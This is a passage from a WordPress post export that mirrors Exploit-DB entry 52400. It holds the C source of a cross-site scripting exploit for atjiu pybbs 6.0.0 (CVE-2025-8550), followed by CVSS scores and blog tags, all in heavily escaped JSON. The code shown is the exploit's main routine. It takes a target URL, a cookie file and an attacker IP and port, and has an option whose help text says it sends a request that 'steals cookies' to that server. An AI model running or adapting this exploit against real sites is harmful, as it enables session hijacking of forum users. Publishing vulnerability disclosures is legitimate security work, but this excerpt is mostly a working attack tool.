\u2591\u2588\u2588 \u2591\u2588\u2588\u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \u2591\u2588\u2588 \\\\n\\”\\r\\n \\”\u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588\u2588\u2588 \u2591\u2588\u2588\u2588\u2588 \\\\n\\”\\r\\n \\”\\\\e[0;37m\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\t\\\\tByte Reaper\\\\e[0m\\\\n\\”\\r\\n );\\r\\n printf(\\”\\\\e[0;31m———————————————————————————————————————————————————\\\\e[0m\\\\n\\”);\\r\\n curl_global_init(CURL_GLOBAL_DEFAULT);\\r\\n\\r\\n struct argparse_option options[] =\\r\\n {\\r\\n OPT_HELP(),\\r\\n OPT_STRING(‘u’,\\r\\n \\”url\\”,\\r\\n \\u0026baseurl,\\r\\n \\”Enter Target Url (http:\/\/\\u003cTARGET\\u003e)\\”),\\r\\n OPT_STRING(‘c’,\\r\\n \\”cookies\\”,\\r\\n \\u0026nameFileC,\\r\\n \\”Enter File cookies\\”),\\r\\n OPT_BOOLEAN(‘k’,\\r\\n \\”cokpay\\”,\\r\\n \\u0026cookiesPayload,\\r\\n \\”Arg For Send Request steals cookies (-k (NULL))\\”),\\r\\n OPT_STRING(‘i’,\\r\\n \\”ip\\”,\\r\\n \\u0026ip,\\r\\n \\”Enter Your Ip Server\\”),\\r\\n OPT_INTEGER(‘p’,\\r\\n \\”port\\”,\\r\\n \\u0026port,\\r\\n \\”Enter Port Server\\”),\\r\\n OPT_BOOLEAN(‘v’,\\r\\n \\”verbose\\”,\\r\\n \\u0026verbose,\\r\\n \\”Verbose Mode\\”),\\r\\n OPT_END(),\\r\\n };\\r\\n struct argparse argparse;\\r\\n argparse_init(\\u0026argparse,\\r\\n options,\\r\\n NULL,\\r\\n 0);\\r\\n\\r\\n argparse_parse(\\u0026argparse,\\r\\n argc,\\r\\n argv);\\r\\n serchServer_alt();\\r\\n if (!baseurl)\\r\\n {\\r\\n printf(\\”\\\\e[1;31m[-] Please Enter target Url !\\\\e[0m\\\\n\\”);\\r\\n printf(\\”\\\\e[1;31m[-] Example : .\/CVE-2025-8550 -u http:\/\/\\u003cTARGET\\u003e\\\\e[0m\\\\n\\”);\\r\\n exitSyscall();\\r\\n }\\r\\n if (nameFileC)\\r\\n {\\r\\n selCookie = 1;\\r\\n }\\r\\n if (verbose)\\r\\n {\\r\\n verbose = 1;\\r\\n }\\r\\n if (cookieSend \\u0026\\u0026 ip \\u0026\\u0026 port)\\r\\n {\\r\\n cookieSend(ip, port, baseurl);\\r\\n }\\r\\n else\\r\\n {\\r\\n printf(\\”[-] Please Enter Ip And Port !\\\\e[0m\\\\n\\”);\\r\\n }\\r\\n runThread(baseurl);\\r\\n curl_global_cleanup();\\r\\n return 0;\\r\\n\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52400″,”cvss”:{“score”:4.8,”severity”:”MEDIUM”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:H\/UI:P\/VC:N\/SC:N\/VI:L\/SI:N\/VA:N\/SA:N\/E:P”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:”3.0″,”vectorString”:”CVSS:3.0\/AV:N\/AC:L\/PR:H\/UI:R\/S:U\/C:N\/I:L\/A:N\/E:P\/RL:O\/RC:C”,”baseScore”:2.4,”baseSeverity”:”LOW”,”attackVector”:”NETWORK”,”attackComplexity”:”LOW”,”privilegesRequired”:”HIGH”,”userInteraction”:”REQUIRED”,”scope”:”UNCHANGED”,”confidentialityImpact”:”NONE”,”integrityImpact”:”LOW”,”availabilityImpact”:”NONE”}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52400″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-11T16:26:28″,”description”:”\/ * Exploit Title : atjiu pybbs 6.0.0 – Cross Site Scripting (XSS) * Exploit Author: Byte Reaper * Vendor Homepage: https:\/\/github.com\/atjiu\/pybbs * Tested on:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,75,12,40,21,13,7,11,5],"class_list":["post-10373","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-48","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n